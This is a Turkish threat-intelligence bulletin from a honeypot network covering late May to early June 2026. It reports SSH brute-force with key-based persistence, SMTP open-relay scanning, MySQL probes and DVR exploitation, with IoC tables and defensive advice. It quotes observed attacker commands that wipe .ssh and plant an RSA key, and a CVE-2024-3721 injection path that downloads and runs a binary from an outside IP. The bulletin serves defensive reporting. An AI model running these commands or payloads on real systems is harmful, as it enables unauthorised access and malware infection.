← Tüm Yazılar
IOC RAPORU HIGH 3 Haziran 2026

Bülten 23 Mayıs–3 Haziran: SSH Persistence Dalgası, SMTP Geri Dönüşü ve SOSTREA Kuyruğu

12 günlük pencerede 2.03M aksiyonlanabilir event. 24 Mayıs'ta Cowrie 274K event ile dönem zirvesi yaptı; SSH tarafında authorized_keys persistence playbook'u yeniden baskınlaştı. SMTP open-relay araması 2 Haziran'da tekrar büyüdü, TBK DVR/SOSTREA düşük hacimli ama kalıcı kaldı.

📅Veri dönemi: 23 Mayıs 00:00 UTC – 3 Haziran 23:59 UTC · OPSEC-filtreli · 12 günlük pencere · son bülten sonrası

Yönetici Özeti

2.03Maksiyonlanabilir event
274K24 Mayıs Cowrie zirvesi
669.8KCowrie SSH/Telnet
18.0KMailoney SMTP

22 Mayıs bülteni TR hosting kaynaklı Suricata/Web scan patlamasını ve 22 Mayıs Hong Kong kaynaklı tek aktör Cowrie spike’ını raporlamıştı. 23 Mayıs–3 Haziran penceresinde manzara yeniden değişti: dönem manşeti SSH brute-force sonrası persistence playbook’u oldu.

Bu raporda P0f pasif fingerprint gürültüsü ana toplama dahil edilmedi. P0f 12 günde 3.75M kayıt üretti; ancak kampanya analizi için aksiyonlanabilir sinyal Suricata, Cowrie, Fatt, Mailoney, Tanner, H0neytr4p ve Dionaea üzerinden okundu. Bu filtreyle dönem toplamı 2.027.419 event.

En belirgin kırılma 24 Mayıs’ta görüldü: Cowrie tek başına 274.088 event üretti. Top kaynakların ilk beşi aynı SSH brute-force/persistence kalıbını taşıyor. Başarılı oturum sonrası komutlarda .ssh temizleme, chattr/lockr -ia, authorized_keys içine RSA anahtarı yazma ve sistem fingerprint alma komutları öne çıkıyor. Bu desen, basit parola denemesinden çok kalıcı erişim kurma niyeti taşıyor.

Aynı dönemde SMTP open-relay araması yeniden büyüdü. Mailoney 22 Mayıs bülteninde zayıflamış görünüyordu; bu pencerede 2 Haziran’da 3.360 event ile tekrar yükseldi. TBK DVR/SOSTREA operatörü ise artık yüksek hacimli dalga değil, ama 12 gün boyunca düşük hacimli ve ısrarcı şekilde görünmeye devam etti.

⚠️ Veri Notu: Feed Yeniden Akıyor, Backfill Ayrı Yapılacak

Bu bülten ham sensör loglarından üretildi. Public API/feed tarafı 3 Haziran'da yeniden veri yazmaya başladı; geçmiş pencere için feed backfill ayrıca ele alınacak. Bu nedenle bu yazıdaki sayılar ham sensör analizidir, anlık API sayaçlarıyla birebir aynı okunmamalıdır.


Pot Dağılımı — 12 Günlük Tablo

PotEventÖnceki BültenNot
Suricata (IDS)1.064.564768.898Hacim yüksek, 23–24 Mayıs ve 2 Haziran belirgin
Cowrie (SSH/Telnet)669.831143.709🔴 4.7× artış; dönem ana sinyali
Fatt (pasif protokol)261.837SSH/TLS/HTTP oturum fingerprint’i
Mailoney (SMTP)17.9818.7982× artış; 2 Haziran geri dönüş
Tanner (HTTP RCE)8.9803.397SOSTREA/TBK devam ediyor
H0neytr4p (HTTPS)3.6957.590Web probe düştü
Dionaea (MySQL)531371MySQL düşük ama kalıcı

Pencere iki parçaya ayrılıyor. 23–24 Mayıs’ta büyük hacimli SSH/Suricata karma dalga var. 25 Mayıs–1 Haziran arasında baseline düşüyor. 2–3 Haziran’da Cowrie ve Fatt yeniden yükseliyor; bu ikinci yükseliş, 24 Mayıs kadar keskin değil ama persistence playbook’unun bitmediğini gösteriyor.

Günlük Dağılım

TarihToplamSuricataCowrieFattMailoneyTannerNot
23 May477.347429.88135.72410.654485389Suricata merkezli yüksek gün
24 May590.227205.808274.088108.0314231.681🔴 SSH persistence zirvesi
25 May105.80966.30927.99010.077760415Normalleşme
26 May106.11287.4159.8226.0621.420786SMTP ısınmaya başlıyor
27 May59.18228.85020.6527.2041.467536Düşük baseline
28 May82.85551.57618.7769.2001.556923Web/RCE hareketli
29 May55.49423.32220.0119.0661.6191.129Tanner gün içi artış
30 May60.79423.41825.8178.7161.539642SSH tabanı korunuyor
31 May46.88318.62618.6107.2321.563699Dönem diplerinden biri
1 Haz73.17324.30333.99812.2002.058463SMTP büyüyor
2 Haz197.99956.88098.15838.6003.360813İkinci SSH/SMTP yükselişi
3 Haz171.54448.17686.18534.7951.731504Yüksek seviye sürüyor

24 Mayıs tek başına dönem toplamının %29’unu oluşturuyor. Bu gün Cowrie, önceki bültenin 5 günlük Cowrie toplamını neredeyse ikiye katladı. 2–3 Haziran’da hacim daha düşük ama hâlâ baseline üstünde; bu yüzden 24 Mayıs tek günlük bir anomali değil, bir kampanya ailesinin yoğun ve sonra kuyruklu çalışması olarak okunmalı.


1. SSH: Persistence Playbook’u Geri Döndü

Cowrie tarafında 12 günlük toplam 669.831 event. En yoğun kaynaklar:

SıraIPCowrie EventBağlam
151.38.168.115168.82424 Mayıs dalgasının ana aktörü
2193.32.162.3491.525Aynı playbook, yüksek hacim
371.227.179.17289.700Residential görünümlü yoğun aktör
4193.32.162.3537.439193.32.162.0/24 kümesi
545.148.10.24034.650SSH brute-force + post-auth
687.251.64.1766.965Düşük ama tekrar eden kaynak
7185.246.128.1334.360Kuyruk aktörü

Bu listenin ilk beşi tekil parola denemesi gibi davranmıyor. Başarılı oturum sonrası aynı komut sırası tekrar ediyor:

Komut / davranışHitYorum
cd ~; chattr -ia .ssh; lockr -ia .ssh1.489.ssh üzerinde immutable/lock kaldırma
lockr -ia .ssh1.489Aynı hazırlık adımı
rm -rf .ssh && mkdir .ssh && echo "ssh-rsa ..."1.486authorized_keys persistence
whoami1.322Yetki bağlamı kontrolü
uname -a1.304Kernel/OS fingerprint
cat /proc/cpuinfo ...1.300+CPU/VM kapasite keşfi
crontab -l, w, top1.299+Kalıcılık ve aktif oturum keşfi
🚨 Kritik Bulgu: Brute Force Değil, Post-Auth Persistence

Bu kampanya yalnızca parola denemiyor; başarılı giriş bulduğunda kalıcı SSH anahtarı bırakmaya çalışıyor. Savunma tarafında sadece başarısız login saymak yetmez. authorized_keys değişimi, chattr kullanımı ve beklenmedik .ssh dizin resetleri ayrı alarm sınıfı olmalı.

Kullanıcı Adı ve Parola Sözlüğü

Kullanıcı adıDeneme
root65.854
admin4.137
support2.518
user1.975
ubuntu1.835
345gs5662d341.402
deploy1.308
dev1.031
oracle997
mysql555
ParolaDeneme
1234563.541
support2.449
admin1.928
3245gs5662d341.447
345gs5662d341.402
password1.175
1231.165
123456781.116
1234999
1714

345gs5662d34 ailesi önceki haftalarda da görünmüştü. Bu pencerede hem kullanıcı adı hem parola tarafında yaşamaya devam ediyor. Bu değer artık geçici anomali değil, IoT/Linux brute-force sözlüklerinde yerleşmiş bir marker gibi davranıyor.

Savunma Notu

SSH için minimum kontrol seti:

  • Password auth kapalı, key-only auth açık.
  • Root login kapalı.
  • authorized_keys dosyaları için FIM veya auditd izleme.
  • chattr, lockr, crontab, /tmp, /dev/shm komut zincirleri için EDR/SIEM korelasyonu.
  • Başarılı SSH login sonrası ilk 60 saniye komut davranışına ayrı risk skoru.

2. Suricata: MySQL, SSH Scan ve TBK DVR Aynı Pencerede

Suricata 12 günde 1.064.564 event üretti. Top imzalar:

İmzaAlertYorum
ET SCAN Suspicious inbound to mySQL port 330630.833MySQL düşük/orta hacimli tarama sürüyor
ET SCAN Potential SSH Scan19.890SSH kampanyasıyla uyumlu
SURICATA STREAM Packet with broken ack13.605Önceki TR scan dalgasının kuyruğu
ET INFO SSH session in progress on Expected Port12.882SSH oturum yoğunluğu
ET INFO SSH-2.0-Go version string Observed5.107Go tabanlı scanner/bot parmak izi
SURICATA TCPv4 invalid checksum4.982Gürültü + scanner anomalisi
SURICATA HTTP Response excessive header repetition3.381Web probe / bozuk client
ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection Attempt1.290CVE-2024-3721 devam ediyor
ET INFO Request to Hidden Environment File - Inbound1.205.env avcılığı

Port dağılımı SSH/Web/MySQL üçgenini net gösteriyor:

PortEventBağlam
22456.094SSH ana gövde
80198.284HTTP probe
443197.630HTTPS probe
330665.569MySQL
14335.759IMAP taraması
808031.787Alternatif HTTP
2526.934SMTP
🔍 Bulgu: MSSQL Geri Gelmedi, MySQL Arka Plan Seviyesinde

Mayıs başındaki MSSQL mega-probe'unun benzeri bu pencerede yok. MySQL 3306 imzası 30.833 alert ile önemli ama tek başına dönemin manşeti değil. Saldırgan odağı SSH kalıcılık ve SMTP keşfine kaymış durumda.


3. SMTP: Open-Relay Araması Yeniden Isındı

Mailoney 12 günde 17.981 event üretti. Günlük dağılım özellikle 1–2 Haziran’da dikkat çekiyor:

TarihMailoney EventNot
23 May485Düşük seviye
24 May423Düşük seviye
25 May760Başlangıç
26 May1.420Artış
27 May1.467Kalıcılaşıyor
28 May1.556Kalıcılaşıyor
29 May1.619Artış
30 May1.539Sabit
31 May1.563Sabit
1 Haz2.058Yükseliş
2 Haz3.360🔴 Dönem zirvesi
3 Haz1.731Kuyruk

Top kaynaklar:

IPEventYorum
102.220.160.999.560Dönemin ana SMTP aktörü
158.94.210.1903.020Önceki open-relay ailesiyle uyumlu
91.92.240.422.034İkincil aktör
185.242.3.100897Kuyruk
178.16.54.237716Kuyruk

22 Mayıs bülteninde SMTP dalgası zayıflamıştı. Bu pencere, zayıflamanın kalıcı olmadığını gösteriyor. Open-relay arayıcıları kısa süreli durup yeniden hedef listesiyle dönebiliyor. Mail gateway savunmasında “son hafta sakin” varsayımı yanıltıcı.

Savunma Notu

SMTP için:

  • Auth gerektirmeyen relay kesin kapalı olmalı.
  • MAIL FROM / RCPT TO başarısız denemeleri ASN/IP bazında korele edilmeli.
  • Submission portu 587 ile public MX portu 25 farklı policy ile izlenmeli.
  • SPF/DKIM/DMARC doğru olsa bile open-relay yanlış config’i spam operasyonuna dönüştürür.

4. TBK DVR/SOSTREA: Büyük Dalga Değil, Kalıcı Kuyruk

Tanner 12 günde 8.980 event üretti. En belirgin path yine SOSTREA marker’ını taşıyor:

/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm bbc; wget http://169.40.104.99/bbc; chmod 777 bbc; ./bbc

Bu path 1.255 kez görüldü. Suricata tarafında aynı aileyi işaret eden ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection Attempt (CVE-2024-3721) imzası 1.290 alert üretti.

Önceki bültenlerdeki yüksek hacimli Hikvision/SOSTREA dalgası bu pencerede yok. Ancak operatör tamamen kaybolmuş değil. Düşük hacimli, düzenli yoklama ve payload denemeleri sürüyor. Bu tür kampanyalar “bitti” demeden önce birkaç pencere daha izlenmeli.

ℹ️ Operasyonel Okuma

SOSTREA/TBK aktivitesi artık ana hacim değil; ama payload URL ve path marker sabit kaldığı için attribution değeri yüksek. Bu imza düşük hacimde bile alarm listesinde tutulmalı.


5. MySQL 3306: Düşük Hacimli Ama Sürekli

Dionaea tarafında 531 event görüldü ve tamamı dst_port=3306 hattında. Top kaynaklar:

IPEventBağlam
45.91.64.633MySQL scan
173.197.14.23120MySQL scan
45.79.123.7618MySQL scan
193.143.1.6612MySQL scan
38.133.213.20012MySQL scan

Bu hacim, Mayıs başındaki MSSQL mega-probe ile kıyaslanamaz. Ancak Suricata’daki 30.833 MySQL alert ile birlikte okunduğunda, 3306’nın arka plan tarama hedefi olarak kalıcılaştığı görülüyor.

Savunma notu kısa: internet’e açık MySQL hâlâ gereksiz risk. Zorunluysa IP allowlist, TLS, güçlü auth, fail2ban/IDS ve query audit birlikte çalışmalı.


6. 2–3 Haziran: İkinci Dalga mı, Kuyruk mu?

2 Haziran’da toplam 197.999 event, 3 Haziran’da 171.544 event görüldü. Bu iki gün 24 Mayıs kadar büyük değil, fakat 25–31 Mayıs baseline’ının belirgin üstünde.

2 Haziran özelinde:

  • Cowrie: 98.158
  • Fatt: 38.600
  • Suricata: 56.880
  • Mailoney: 3.360

Bu kompozisyon, tek pot anomalisi değil. SSH oturumları, protokol fingerprint’i, IDS sinyali ve SMTP keşfi aynı gün yükseliyor. Bu nedenle 2 Haziran’ı ayrı bir “ikinci dalga” adayı olarak işaretliyoruz. 3 Haziran’da hacim düşse de hâlâ yüksek; kampanya kuyruğu devam ediyor.


IoC Tablosu — Bu Pencerenin Öne Çıkanları

IoCTürBağlamÖncelik
51.38.168.115IPSSH persistence ana aktörühigh
193.32.162.34IPSSH brute-force/persistencehigh
71.227.179.172IPYoğun SSH aktörühigh
193.32.162.35IPAynı SSH kümesihigh
45.148.10.240IPSSH brute-force/persistencehigh
102.220.160.99IPSMTP open-relay ana aktörühigh
158.94.210.190IPSMTP open-relaymedium
192.109.200.204IPTBK/SOSTREA geçmiş aktörü, Suricata/Fatt görünümümedium
169.40.104.99/bbcURL pathSOSTREA payload URLhigh
345gs5662d34credential markerSSH username/password markermedium
3245gs5662d34credential markerSSH password variantmedium
ET SCAN Suspicious inbound to mySQL port 3306IDSMySQL scanmedium
ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection AttemptIDSCVE-2024-3721high

IOC’lar savunma amaçlı paylaşılır. Tek IP engelleme yerine davranış korelasyonu önerilir; aynı aktör altyapı değiştirince marker’lar daha uzun ömürlü kalır.


Sonuç

23 Mayıs–3 Haziran penceresi üç mesaj veriyor:

  1. SSH tarafında kalıcı erişim kurma niyeti güçlendi. Brute-force sonrası authorized_keys persistence zinciri dönemin en kritik bulgusu.
  2. SMTP open-relay araması bitmedi. 2 Haziran zirvesi, önceki zayıflamanın geçici olduğunu gösteriyor.
  3. SOSTREA/TBK düşük hacimde kalıcı. Ana dalga değil, ama imza değeri yüksek bir kuyruk kampanya olarak izlenmeli.

Savunma tarafı için öncelik sırası: SSH hardening ve post-auth komut izleme, SMTP relay konfigürasyon denetimi, internet’e açık MySQL azaltımı, DVR/IoT web yüzeylerinde CVE-2024-3721 benzeri path marker alarmı.


Metodoloji ve Lisans

Bu rapor 23 Mayıs–3 Haziran 2026 arası Tellal honeypot sensörlerinde toplanan ham logların OPSEC-filtreli analiziyle hazırlandı. P0f pasif fingerprint verisi 3.75M kayıt üretmesine rağmen headline toplamına dahil edilmedi; aksiyonlanabilir toplam Suricata, Cowrie, Fatt, Mailoney, Tanner, H0neytr4p ve Dionaea üzerinden hesaplandı. Dahili IP’ler, yönetim trafiği, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır.

Lisans: CC BY 4.0 — Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal — Threat Intelligence Feed · tellal.net